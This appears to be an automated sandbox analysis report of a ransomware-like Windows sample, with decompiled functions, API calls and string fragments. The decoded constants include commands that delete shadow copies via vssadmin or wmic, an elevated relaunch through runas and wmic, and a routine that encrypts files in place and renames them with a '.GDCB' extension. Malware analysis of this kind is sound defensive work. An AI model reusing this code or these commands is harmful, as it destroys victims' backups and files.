T, xrefs: 0FBC7E15
5, xrefs: 0FBC7D2D
3, xrefs: 0FBC7EBD
p, xrefs: 0FBC7DC3
8, xrefs: 0FBC7E7E
, xrefs: 0FBC7E4D
G, xrefs: 0FBC7E38
e, xrefs: 0FBC7DD7
1, xrefs: 0FBC7D87
i, xrefs: 0FBC7D4B
c, xrefs: 0FBC7E3F
K, xrefs: 0FBC7DE1
e, xrefs: 0FBC7DCD
, xrefs: 0FBC7D69
i, xrefs: 0FBC7E2A
a, xrefs: 0FBC7D23
7, xrefs: 0FBC7EB6
z, xrefs: 0FBC7D0F
8, xrefs: 0FBC7E8C
, xrefs: 0FBC7D91
, xrefs: 0FBC7E93
o, xrefs: 0FBC7E46
A, xrefs: 0FBC7DB9
(, xrefs: 0FBC7D41
O, xrefs: 0FBC7D9B
3, xrefs: 0FBC7E00
a, xrefs: 0FBC7E9A
6, xrefs: 0FBC7DA5
., xrefs: 0FBC7E77
a, xrefs: 0FBC7EA1

Memory Dump Source

Source File: 00000009.00000002.293108721.000000000FBC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 0FBC0000, based on PE: true

Associated: 00000009.00000002.293102510.000000000FBC0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000009.00000002.293144665.000000000FBCA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000009.00000002.293155621.000000000FBD2000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000009.00000002.293163225.000000000FBD4000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fbc0000_wjaoab.jbxd

Yara matches

Similarity

API ID: InternetOpen
String ID: $ $ $ $ $ $($)$.$.$0$1$3$3$3$5$5$5$5$6$6$7$7$8$8$A$G$K$K$L$M$O$T$T$a$a$a$c$d$e$e$e$e$h$i$i$i$l$o$o$p$t$w$z
API String ID: 2038078732-2805935662
Opcode ID: f2c82dd719d54498d6905cc5e8522a9bd6e643af8361d161577f5d147924823c
Instruction ID: 17398ceb8545a89f7969d9a3350730303f3d6214abe8620d1f13c6376ea35593
Opcode Fuzzy Hash: f2c82dd719d54498d6905cc5e8522a9bd6e643af8361d161577f5d147924823c
Instruction Fuzzy Hash: E641A8B4811358DEEB21CF919998B9EBFF5FB04748F50819ED5086B201C7F60A89CF64

Uniqueness

Uniqueness Score: -1.00%

Function 0FBC43E0 Relevance: 78.8, APIs: 5, Strings: 40, Instructions: 99
memorystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 97%

			E0FBC43E0(void* __eflags) {
				short _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				char _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				char _v120;
				short _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				intOrPtr _v148;
				char _v152;
				short _v156;
				intOrPtr _v160;
				intOrPtr _v164;
				intOrPtr _v168;
				char _v172;
				short* _v176;
				short* _t51;
				WCHAR* _t59;
				void* _t62;
				signed int _t66;
				void* _t69;

				if(E0FBC3B20(_t62) == 0) {
					_v172 = 0x63005c;
					_v168 = 0x64006d;
					_v8 = 0;
					_t59 =  &_v172;
					_v164 = 0x65002e;
					_t51 =  &_v84;
					_v160 = 0x650078;
					_v156 = 0;
					_v84 = 0x63002f;
					_v80 = 0x760020;
					_v76 = 0x730073;
					_v72 = 0x640061;
					_v68 = 0x69006d;
					_v64 = 0x20006e;
					_v60 = 0x650064;
					_v56 = 0x65006c;
					_v52 = 0x650074;
					_v48 = 0x730020;
					_v44 = 0x610068;
					_v40 = 0x6f0064;
					_v36 = 0x730077;
					_v32 = 0x2f0020;
					_v28 = 0x6c0061;
					_v24 = 0x20006c;
					_v20 = 0x71002f;
					_v16 = 0x690075;
					_v12 = 0x740065;
				} else {
					_v152 = 0x77005c;
					_v148 = 0x650062;
					_t59 =  &_v152;
					_v144 = 0x5c006d;
					_t51 =  &_v120;
					_v140 = 0x6d0077;
					_v136 = 0x630069;
					_v132 = 0x65002e;
					_v128 = 0x650078;
					_v124 = 0;
					_v120 = 0x680073;
					_v116 = 0x640061;
					_v112 = 0x77006f;
					_v108 = 0x6f0063;
					_v104 = 0x790070;
					_v100 = 0x640020;
					_v96 = 0x6c0065;
					_v92 = 0x740065;
					_v88 = 0x65;
				}
				_v176 = _t51;
				_t69 = VirtualAlloc(0, 0x400, 0x3000, 0x40);
				if(_t69 != 0) {
					GetSystemDirectoryW(_t69, 0x100);
					lstrcatW(_t69, _t59);
					ShellExecuteW(0, L"open", _t69, _v176, 0, 0);
					asm("sbb edi, edi");
					_t66 =  ~0x20;
				} else {
					_t66 = 0;
				}
				VirtualFree(_t69, 0, 0x8000);
				return _t66;
			}

0x0fbc43f6
0x0fbc4492
0x0fbc449c
0x0fbc44a4
0x0fbc44ac
0x0fbc44b0
0x0fbc44b8
0x0fbc44bc
0x0fbc44c4
0x0fbc44c9
0x0fbc44d1
0x0fbc44d9
0x0fbc44e1
0x0fbc44e9
0x0fbc44f1
0x0fbc44f9
0x0fbc4504
0x0fbc450f
0x0fbc451a
0x0fbc4525
0x0fbc4530
0x0fbc453b
0x0fbc4546
0x0fbc4551
0x0fbc455c
0x0fbc4567
0x0fbc4572
0x0fbc457d
0x0fbc43fc
0x0fbc43fe
0x0fbc4406
0x0fbc440e
0x0fbc4412
0x0fbc441a
0x0fbc441e
0x0fbc4426
0x0fbc442e
0x0fbc4436
0x0fbc443e
0x0fbc4443
0x0fbc444b
0x0fbc4453
0x0fbc445b
0x0fbc4463
0x0fbc446b
0x0fbc4473
0x0fbc447b
0x0fbc4483
0x0fbc4483
0x0fbc4596
0x0fbc45a5
0x0fbc45a9
0x0fbc45b5
0x0fbc45bd
0x0fbc45d3
0x0fbc45db
0x0fbc45dd
0x0fbc45ab
0x0fbc45ab
0x0fbc45ab
0x0fbc45e7
0x0fbc45f5

APIs

Part of subcall function 0FBC3B20: _memset.LIBCMT ref: 0FBC3B72
Part of subcall function 0FBC3B20: VerSetConditionMask.KERNEL32(00000000,00000000,00000002,00000003,00000001,00000003,00000020,00000003,?,?,00000000), ref: 0FBC3B96
Part of subcall function 0FBC3B20: VerSetConditionMask.KERNEL32(00000000,?,?,?,00000000), ref: 0FBC3B9A
Part of subcall function 0FBC3B20: VerSetConditionMask.KERNEL32(00000000,?,?,?,?,00000000), ref: 0FBC3B9E
Part of subcall function 0FBC3B20: VerifyVersionInfoW.KERNEL32(0000011C,00000023,00000000), ref: 0FBC3BC5

VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000040), ref: 0FBC459F
GetSystemDirectoryW.KERNEL32(00000000,00000100), ref: 0FBC45B5
lstrcatW.KERNEL32(00000000,0063005C), ref: 0FBC45BD
ShellExecuteW.SHELL32(00000000,open,00000000,?,00000000,00000000), ref: 0FBC45D3
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0FBC45E7

Strings

b, xrefs: 0FBC4406
., xrefs: 0FBC442E
o, xrefs: 0FBC4453
e, xrefs: 0FBC4473
p, xrefs: 0FBC4463
, xrefs: 0FBC4546
h, xrefs: 0FBC4525
a, xrefs: 0FBC444B
e, xrefs: 0FBC457D
a, xrefs: 0FBC4551
t, xrefs: 0FBC450F
m, xrefs: 0FBC4412
u, xrefs: 0FBC4572
\, xrefs: 0FBC4492
d, xrefs: 0FBC4530
e, xrefs: 0FBC447B
, xrefs: 0FBC446B
c, xrefs: 0FBC445B
s, xrefs: 0FBC4443
w, xrefs: 0FBC441E
/, xrefs: 0FBC4567
w, xrefs: 0FBC453B
open, xrefs: 0FBC45CC
/, xrefs: 0FBC44C9
s, xrefs: 0FBC44D9
l, xrefs: 0FBC455C
, xrefs: 0FBC451A
e, xrefs: 0FBC4483
m, xrefs: 0FBC449C
n, xrefs: 0FBC44F1
m, xrefs: 0FBC44E9
., xrefs: 0FBC44B0
d, xrefs: 0FBC44F9
a, xrefs: 0FBC44E1
\, xrefs: 0FBC43FE
x, xrefs: 0FBC44BC
l, xrefs: 0FBC4504
i, xrefs: 0FBC4426
x, xrefs: 0FBC4436
, xrefs: 0FBC44D1

Memory Dump Source

Source File: 00000009.00000002.293108721.000000000FBC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 0FBC0000, based on PE: true

Associated: 00000009.00000002.293102510.000000000FBC0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000009.00000002.293144665.000000000FBCA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000009.00000002.293155621.000000000FBD2000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000009.00000002.293163225.000000000FBD4000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fbc0000_wjaoab.jbxd

Yara matches

Similarity

API ID: ConditionMask$Virtual$AllocDirectoryExecuteFreeInfoShellSystemVerifyVersion_memsetlstrcat
String ID: $ $ $ $.$.$/$/$\$\$a$a$a$b$c$d$d$e$e$e$e$h$i$l$l$m$m$m$n$o$open$p$s$s$t$u$w$w$x$x
API String ID: 2684037697-4098772853
Opcode ID: b6d9442d16634e72325cf9b6e8437ccbd059e91e54eb7d4026becb14cee4bab6
Instruction ID: 975930d2315a9d3e52b5b89b99484713fc959c96d7b31b740db8c1543f7bed46
Opcode Fuzzy Hash: b6d9442d16634e72325cf9b6e8437ccbd059e91e54eb7d4026becb14cee4bab6
Instruction Fuzzy Hash: CC4117B0148380DFE320CF219859B5BBFE6BB85B49F10491CE6985A291C7F6854CCFA7

Uniqueness

Uniqueness Score: -1.00%

Function 0FBC3BE0 Relevance: 77.1, APIs: 9, Strings: 35, Instructions: 109
memorysynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0FBC3BE0(void* __ecx, void* __edx, void* __eflags) {
				char _v1020;
				short _v1028;
				char _v1532;
				short _v1540;
				intOrPtr _v1548;
				intOrPtr _v1552;
				intOrPtr _v1556;
				intOrPtr _v1560;
				intOrPtr _v1564;
				intOrPtr _v1568;
				intOrPtr _v1572;
				intOrPtr _v1576;
				intOrPtr _v1580;
				intOrPtr _v1584;
				intOrPtr _v1588;
				intOrPtr _v1592;
				intOrPtr _v1596;
				intOrPtr _v1600;
				intOrPtr _v1604;
				intOrPtr _v1608;
				intOrPtr _v1612;
				intOrPtr _v1616;
				short _v1620;
				intOrPtr _v1624;
				intOrPtr _v1628;
				intOrPtr _v1632;
				intOrPtr _v1636;
				intOrPtr _v1640;
				intOrPtr _v1644;
				intOrPtr _v1648;
				intOrPtr _v1652;
				intOrPtr _v1656;
				intOrPtr _v1660;
				intOrPtr _v1664;
				intOrPtr _v1668;
				intOrPtr _v1672;
				short _v1676;
				char _v1680;
				int _t54;
				struct HWND__* _t62;
				long _t66;
				void* _t76;
				void* _t78;
				void* _t80;

				_t78 = __ecx;
				_t54 = E0FBC3B20(__edx);
				if(_t54 != 0) {
					_t54 = E0FBC3AA0();
					if(_t54 == 0) {
						_v1676 = 0x770025;
						_v1672 = 0x6e0069;
						_v1668 = 0x690064;
						_v1664 = 0x250072;
						_v1660 = 0x73005c;
						_v1656 = 0x730079;
						_v1652 = 0x650074;
						_v1648 = 0x33006d;
						_v1644 = 0x5c0032;
						_v1640 = 0x620077;
						_v1636 = 0x6d0065;
						_v1632 = 0x77005c;
						_v1628 = 0x69006d;
						_v1624 = 0x63;
						ExpandEnvironmentStringsW( &_v1676,  &_v1540, 0xff);
						_v1620 = 0x720070;
						_v1616 = 0x63006f;
						_v1612 = 0x730065;
						_v1608 = 0x200073;
						_v1604 = 0x610063;
						_v1600 = 0x6c006c;
						_v1596 = 0x630020;
						_v1592 = 0x650072;
						_v1588 = 0x740061;
						_v1584 = 0x200065;
						_v1580 = 0x630022;
						_v1576 = 0x64006d;
						_v1572 = 0x2f0020;
						_v1568 = 0x200063;
						_v1564 = 0x740073;
						_v1560 = 0x720061;
						_v1556 = 0x200074;
						_v1552 = 0x730025;
						_v1548 = 0x22;
						wsprintfW( &_v1028,  &_v1620, _t78);
						_t76 = VirtualAlloc(0, 0x3d, 0x3000, 0x40);
						 *_t76 = 0x3c;
						 *(_t76 + 4) = 0x40;
						_t62 = GetForegroundWindow();
						_t80 = 0;
						 *(_t76 + 8) = _t62;
						_v1680 = 0x750072;
						_v1676 = 0x61006e;
						_v1672 = 0x73;
						 *((intOrPtr*)(_t76 + 0xc)) =  &_v1680;
						 *((intOrPtr*)(_t76 + 0x10)) =  &_v1532;
						 *((intOrPtr*)(_t76 + 0x14)) =  &_v1020;
						 *(_t76 + 0x18) = 0;
						 *(_t76 + 0x1c) = 0;
						 *(_t76 + 0x20) = 0;
						while(1) {
							_t66 = ShellExecuteExW(_t76);
							if(_t66 != 0) {
								break;
							}
							_t80 = _t80 + 1;
							if(_t80 < 0x64) {
								continue;
							}
							_t54 = VirtualFree(_t76, _t66, 0x8000);
							goto L6;
						}
						WaitForSingleObject( *(_t76 + 0x38), 0xffffffff);
						CloseHandle( *(_t76 + 0x38));
						ExitProcess(0);
					}
				}
				L6:
				return _t54;
			}

0x0fbc3bef
0x0fbc3bf1
0x0fbc3bf8
0x0fbc3bfe
0x0fbc3c05
0x0fbc3c17
0x0fbc3c24
0x0fbc3c2d
0x0fbc3c35
0x0fbc3c3d
0x0fbc3c45
0x0fbc3c4d
0x0fbc3c55
0x0fbc3c5d
0x0fbc3c65
0x0fbc3c6d
0x0fbc3c75
0x0fbc3c7d
0x0fbc3c85
0x0fbc3c8d
0x0fbc3c98
0x0fbc3ca8
0x0fbc3cb1
0x0fbc3cb9
0x0fbc3cc1
0x0fbc3cc9
0x0fbc3cd1
0x0fbc3cd9
0x0fbc3ce1
0x0fbc3ce9
0x0fbc3cf4
0x0fbc3cff
0x0fbc3d0a
0x0fbc3d15
0x0fbc3d20
0x0fbc3d2b
0x0fbc3d36
0x0fbc3d41
0x0fbc3d4c
0x0fbc3d57
0x0fbc3d71
0x0fbc3d73
0x0fbc3d79
0x0fbc3d80
0x0fbc3d8c
0x0fbc3d8e
0x0fbc3d95
0x0fbc3d9d
0x0fbc3da5
0x0fbc3dad
0x0fbc3db7
0x0fbc3dc1
0x0fbc3dc4
0x0fbc3dcb
0x0fbc3dd2
0x0fbc3de0
0x0fbc3de1
0x0fbc3de5
0x00000000
0x00000000
0x0fbc3de7
0x0fbc3deb
0x00000000
0x00000000
0x0fbc3df4
0x00000000
0x0fbc3df4
0x0fbc3e06
0x0fbc3e0f
0x0fbc3e17
0x0fbc3e17
0x0fbc3c05
0x0fbc3dfa
0x0fbc3e00

APIs

Part of subcall function 0FBC3B20: _memset.LIBCMT ref: 0FBC3B72
Part of subcall function 0FBC3B20: VerSetConditionMask.KERNEL32(00000000,00000000,00000002,00000003,00000001,00000003,00000020,00000003,?,?,00000000), ref: 0FBC3B96
Part of subcall function 0FBC3B20: VerSetConditionMask.KERNEL32(00000000,?,?,?,00000000), ref: 0FBC3B9A
Part of subcall function 0FBC3B20: VerSetConditionMask.KERNEL32(00000000,?,?,?,?,00000000), ref: 0FBC3B9E
Part of subcall function 0FBC3B20: VerifyVersionInfoW.KERNEL32(0000011C,00000023,00000000), ref: 0FBC3BC5

Part of subcall function 0FBC3AA0: AllocateAndInitializeSid.ADVAPI32(00000000,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 0FBC3AD0

ExpandEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0FBC3C8D
wsprintfW.USER32 ref: 0FBC3D57
VirtualAlloc.KERNEL32(00000000,0000003D,00003000,00000040), ref: 0FBC3D6B
GetForegroundWindow.USER32 ref: 0FBC3D80
ShellExecuteExW.SHELL32(00000000), ref: 0FBC3DE1
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0FBC3DF4
WaitForSingleObject.KERNEL32(?,000000FF), ref: 0FBC3E06
CloseHandle.KERNEL32(?), ref: 0FBC3E0F
ExitProcess.KERNEL32 ref: 0FBC3E17

Strings

e, xrefs: 0FBC3CB1
a, xrefs: 0FBC3CE1
t, xrefs: 0FBC3C4D
s, xrefs: 0FBC3DA5
%, xrefs: 0FBC3C17
s, xrefs: 0FBC3CB9
r, xrefs: 0FBC3D95
2, xrefs: 0FBC3C5D
", xrefs: 0FBC3CF4
c, xrefs: 0FBC3C85
m, xrefs: 0FBC3CFF
, xrefs: 0FBC3CD1
\, xrefs: 0FBC3C75
\, xrefs: 0FBC3C3D
m, xrefs: 0FBC3C55
l, xrefs: 0FBC3CC9
c, xrefs: 0FBC3D15
e, xrefs: 0FBC3C6D
p, xrefs: 0FBC3C98
%, xrefs: 0FBC3D41
r, xrefs: 0FBC3CD9
c, xrefs: 0FBC3CC1
, xrefs: 0FBC3D0A
y, xrefs: 0FBC3C45
t, xrefs: 0FBC3D36
n, xrefs: 0FBC3D9D
d, xrefs: 0FBC3C2D
w, xrefs: 0FBC3C65
o, xrefs: 0FBC3CA8
s, xrefs: 0FBC3D20
r, xrefs: 0FBC3C35
", xrefs: 0FBC3D4C
i, xrefs: 0FBC3C24
a, xrefs: 0FBC3D2B
e, xrefs: 0FBC3CE9

Memory Dump Source

Source File: 00000009.00000002.293108721.000000000FBC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 0FBC0000, based on PE: true

Associated: 00000009.00000002.293102510.000000000FBC0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000009.00000002.293144665.000000000FBCA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000009.00000002.293155621.000000000FBD2000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000009.00000002.293163225.000000000FBD4000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fbc0000_wjaoab.jbxd

Yara matches

Similarity

API ID: ConditionMask$Virtual$AllocAllocateCloseEnvironmentExecuteExitExpandForegroundFreeHandleInfoInitializeObjectProcessShellSingleStringsVerifyVersionWaitWindow_memsetwsprintf
String ID: $ $"$"$%$%$2$\$\$a$a$c$c$c$d$e$e$e$i$l$m$m$n$o$p$r$r$r$s$s$s$t$t$w$y
API String ID: 561366689-3790645798
Opcode ID: 011a6daa14739b71f6c9164bbe10be41eaddf011a18bb2ea7763ae190e2f3257
Instruction ID: 72760152b44f4d54ed76e87077e809987ae8f2f14d0aea91b839e80d65c1d8f6
Opcode Fuzzy Hash: 011a6daa14739b71f6c9164bbe10be41eaddf011a18bb2ea7763ae190e2f3257
Instruction Fuzzy Hash: FD5157B0108344DFE3208F51D448B8BBFE9FF85B59F004A1DE6988A251C7BA9158CFE2

Uniqueness

Uniqueness Score: -1.00%

Function 0FBC35E0 Relevance: 66.8, APIs: 32, Strings: 6, Instructions: 320
memorystringwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 78%

			E0FBC35E0(WCHAR* __ecx, void* __edx, void* __eflags) {
				long _v8;
				void* _v12;
				long _v16;
				long _v20;
				void* _v24;
				void* _v28;
				long _v32;
				long _v36;
				void _v40;
				void _v44;
				signed int _v48;
				WCHAR* _v52;
				WCHAR* _v56;
				void* _v60;
				void* _v64;
				void* _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				short _v80;
				int _v84;
				char _v88;
				char _v104;
				char _v108;
				char _v140;
				char _v388;
				void* _t96;
				void* _t97;
				struct HWND__* _t99;
				void* _t101;
				void* _t107;
				long _t124;
				long _t125;
				long _t128;
				WCHAR* _t145;
				void* _t147;
				void* _t149;
				void* _t151;
				WCHAR* _t162;
				void* _t163;
				void* _t164;
				void _t165;
				void* _t166;
				long _t168;
				void* _t173;
				void* _t175;
				void* _t176;
				void* _t177;

				_t145 = __ecx;
				_t166 = __edx;
				_v52 = __ecx;
				SetFileAttributesW(_t145, GetFileAttributesW(__ecx) & 0xfffffffe);
				_v20 = 0;
				_v32 = 0;
				_t151 = _t166;
				E0FBC63D0(_t151, 0, 0,  &_v20,  &_v32);
				_t162 = VirtualAlloc(0, 0x401, 0x3000, 0x40);
				_v80 = 0x47002e;
				_v56 = _t162;
				_v76 = 0x430044;
				_v72 = 0x42;
				lstrcpyW(_t162, _t145);
				lstrcatW(_t162,  &_v80);
				asm("movdqa xmm0, [0xfbd04b0]");
				asm("movdqu [ebp-0x88], xmm0");
				_push(_t151);
				asm("movdqa xmm0, [0xfbd04b0]");
				asm("movdqu [ebp-0x78], xmm0");
				_v108 = 0;
				asm("movdqa xmm0, [0xfbd04b0]");
				asm("movdqu [ebp-0x64], xmm0");
				E0FBC82A0( &_v104, 0x10);
				E0FBC82A0( &_v140, 0x20);
				_t96 = VirtualAlloc(0, 0x800, 0x3000, 4);
				asm("movdqu xmm0, [ebp-0x88]");
				asm("movdqu [ebx], xmm0");
				asm("movdqu xmm0, [ebp-0x78]");
				_v24 = _t96;
				asm("movdqu [ebx+0x10], xmm0");
				_t97 = VirtualAlloc(0, 0x800, 0x3000, 4);
				asm("movdqu xmm0, [ebp-0x64]");
				_t163 = _t97;
				_v60 = _t163;
				asm("movdqu [edi], xmm0");
				_v88 = 0x20;
				_v84 = 0x10;
				_t99 = E0FBC6530(_v20, _v32, _t96,  &_v88, 0x800);
				_t175 = _t173 + 0x18;
				if(_t99 != 0) {
					_t101 = E0FBC6530(_v20, _v32, _t163,  &_v84, 0x800);
					_t176 = _t175 + 0x14;
					if(_t101 != 0) {
						E0FBC83C0( &_v140,  &_v388);
						_t177 = _t176 + 8;
						_t147 = CreateFileW(_v52, 0xc0000000, 1, 0, 3, 0x80, 0);
						_v28 = _t147;
						if(_t147 != 0xffffffff) {
							_t164 = VirtualAlloc(0, 8, 0x3000, 4);
							 *_t164 = 0;
							 *(_t164 + 4) = 0;
							_t107 = VirtualAlloc(0, 0x100001, 0x3000, 4);
							_t168 = 0;
							_v12 = _t107;
							_v36 = 0;
							while(ReadFile(_t147, _t107, 0x100000,  &_v8, 0) != 0) {
								_t124 = _v8;
								if(_t124 != 0) {
									_t149 = 0;
									_v64 = 0;
									_t168 =  <  ? 1 : _t168;
									 *_t164 =  *_t164 + _t124;
									asm("adc [edi+0x4], ebx");
									_t125 = _v8;
									_v48 = _t125;
									if((_t125 & 0x0000000f) != 0) {
										do {
											_t125 = _t125 + 1;
										} while ((_t125 & 0x0000000f) != 0);
										_v8 = _t125;
									}
									_v68 = VirtualAlloc(0, _t125, 0x3000, 4);
									E0FBC89C0(_t126, _v12, _v48);
									_t128 = _v8;
									_t177 = _t177 + 0xc;
									_v40 = _t128;
									if(VirtualAlloc(0, _t128, 0x3000, 4) != 0) {
										E0FBC3500(_v68, _v40,  &_v64,  &_v388,  &_v104, _t129);
										_t149 = _v64;
										_t177 = _t177 + 0x10;
									}
									VirtualFree(_v68, 0, 0x8000);
									SetFilePointer(_v28,  ~_v48, 0, 1);
									if(WriteFile(_v28, _t149, _v8,  &_v16, 0) == 0) {
										_t168 = 1;
										_v36 = 1;
									}
									VirtualFree(_t149, 0, 0x8000);
									_t147 = _v28;
									if(_t168 == 0) {
										_t107 = _v12;
										continue;
									}
								}
								break;
							}
							VirtualFree(_v12, 0, 0x8000);
							if(_v36 == 0) {
								WriteFile(_t147, _v24, 0x100,  &_v16, 0);
								WriteFile(_t147, _v60, 0x100,  &_v16, 0);
								WriteFile(_t147, _t164, 0x10,  &_v16, 0);
							}
							CloseHandle(_t147);
							_v40 =  *_t164;
							VirtualFree(_t164, 0, 0x8000);
							VirtualFree(_v24, 0, 0x8000);
							VirtualFree(_v60, 0, 0x8000);
							if(_v36 == 0) {
								MoveFileW(_v52, _v56);
							}
							_t165 = _v40;
						} else {
							VirtualFree(_t163, 0, 0x8000);
							VirtualFree(_v24, 0, 0x8000);
							asm("xorps xmm0, xmm0");
							asm("movlpd [ebp-0x28], xmm0");
							_t165 = _v44;
						}
					} else {
						GetLastError();
						asm("xorps xmm0, xmm0");
						asm("movlpd [ebp-0x28], xmm0");
						_t165 = _v44;
					}
				} else {
					MessageBoxA(_t99, "Fatal error: rsaenh.dll is not initialized as well", "Fatal error", 0x10);
					asm("xorps xmm0, xmm0");
					asm("movlpd [ebp-0x28], xmm0");
					_t165 = _v44;
				}
				VirtualFree(_v56, 0, 0x8000);
				return _t165;
			}

0x0fbc35eb
0x0fbc35ed
0x0fbc35f1
0x0fbc35ff
0x0fbc3608
0x0fbc3613
0x0fbc361f
0x0fbc3621
0x0fbc363c
0x0fbc363e
0x0fbc3647
0x0fbc364a
0x0fbc3651
0x0fbc3658
0x0fbc3663
0x0fbc3669
0x0fbc3676
0x0fbc367e
0x0fbc367f
0x0fbc368a
0x0fbc368f
0x0fbc3693
0x0fbc369b
0x0fbc36a0
0x0fbc36b0
0x0fbc36c6
0x0fbc36c8
0x0fbc36de
0x0fbc36e4
0x0fbc36e9
0x0fbc36ec
0x0fbc36f1
0x0fbc36f3
0x0fbc36f8
0x0fbc3703
0x0fbc3706
0x0fbc370a
0x0fbc3711
0x0fbc371f
0x0fbc3724
0x0fbc3729
0x0fbc3767
0x0fbc376c
0x0fbc3771
0x0fbc37a0
0x0fbc37a5
0x0fbc37c3
0x0fbc37c5
0x0fbc37cb
0x0fbc380b
0x0fbc3819
0x0fbc381f
0x0fbc3826
0x0fbc3828
0x0fbc382a
0x0fbc382d
0x0fbc3835
0x0fbc3850
0x0fbc3855
0x0fbc385b
0x0fbc3867
0x0fbc386a
0x0fbc386d
0x0fbc386f
0x0fbc3872
0x0fbc3875
0x0fbc387a
0x0fbc3880
0x0fbc3880
0x0fbc3881
0x0fbc3885
0x0fbc3885
0x0fbc389b
0x0fbc38a2
0x0fbc38a7
0x0fbc38aa
0x0fbc38ad
0x0fbc38c2
0x0fbc38da
0x0fbc38df
0x0fbc38e2
0x0fbc38e2
0x0fbc38ef
0x0fbc3902
0x0fbc391d
0x0fbc391f
0x0fbc3924
0x0fbc3924
0x0fbc392f
0x0fbc3935
0x0fbc393a
0x0fbc3832
0x00000000
0x0fbc3832
0x0fbc393a
0x00000000
0x0fbc3855
0x0fbc3950
0x0fbc3956
0x0fbc3967
0x0fbc397c
0x0fbc398c
0x0fbc398c
0x0fbc3993
0x0fbc39a6
0x0fbc39a9
0x0fbc39b5
0x0fbc39c1
0x0fbc39c7
0x0fbc39cf
0x0fbc39cf
0x0fbc39d5
0x0fbc37cd
0x0fbc37db
0x0fbc37e7
0x0fbc37e9
0x0fbc37ec
0x0fbc37f4
0x0fbc37f4
0x0fbc3773
0x0fbc3773
0x0fbc377f
0x0fbc3782
0x0fbc378a
0x0fbc378a
0x0fbc372b
0x0fbc3738
0x0fbc3744
0x0fbc3747
0x0fbc374f
0x0fbc374f
0x0fbc39e2
0x0fbc39ee

APIs

GetFileAttributesW.KERNEL32(00000000,00000010,00000000,00000000), ref: 0FBC35F4
SetFileAttributesW.KERNEL32(00000000,00000000), ref: 0FBC35FF
VirtualAlloc.KERNEL32(00000000,00000401,00003000,00000040,00000000,00000000,00000000,?), ref: 0FBC363A
lstrcpyW.KERNEL32 ref: 0FBC3658
lstrcatW.KERNEL32(00000000,0047002E), ref: 0FBC3663

Part of subcall function 0FBC82A0: CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000,00000000,00000000,00000000), ref: 0FBC82C0
Part of subcall function 0FBC82A0: VirtualAlloc.KERNEL32(00000000,00000007,00003000,00000040), ref: 0FBC82E8
Part of subcall function 0FBC82A0: GetModuleHandleA.KERNEL32(?), ref: 0FBC833D
Part of subcall function 0FBC82A0: LoadLibraryA.KERNEL32(Advapi32.dll), ref: 0FBC834B
Part of subcall function 0FBC82A0: GetProcAddress.KERNEL32(00000000,CryptGenRandomAdvapi32.dll), ref: 0FBC835A
Part of subcall function 0FBC82A0: CryptReleaseContext.ADVAPI32(?,00000000), ref: 0FBC837E
Part of subcall function 0FBC82A0: VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0FBC838C

Part of subcall function 0FBC82A0: CryptReleaseContext.ADVAPI32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,0FBC292B), ref: 0FBC83A0
Part of subcall function 0FBC82A0: VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,?,?,?,0FBC292B), ref: 0FBC83AE

VirtualAlloc.KERNEL32(00000000,00000800,00003000,00000004), ref: 0FBC36C6
VirtualAlloc.KERNEL32(00000000,00000800,00003000,00000004), ref: 0FBC36F1

Part of subcall function 0FBC6530: EnterCriticalSection.KERNEL32(0FBD2A48,?,0FBC3724,00000000,00000000,00000000,?,00000800), ref: 0FBC653B
Part of subcall function 0FBC6530: CryptAcquireContextW.ADVAPI32(00000000,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000,?,0FBC3724,00000000,00000000,00000000), ref: 0FBC655E
Part of subcall function 0FBC6530: GetLastError.KERNEL32(?,0FBC3724,00000000,00000000,00000000), ref: 0FBC6568
Part of subcall function 0FBC6530: CryptAcquireContextW.ADVAPI32(00000000,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008,?,0FBC3724,00000000,00000000,00000000), ref: 0FBC6584

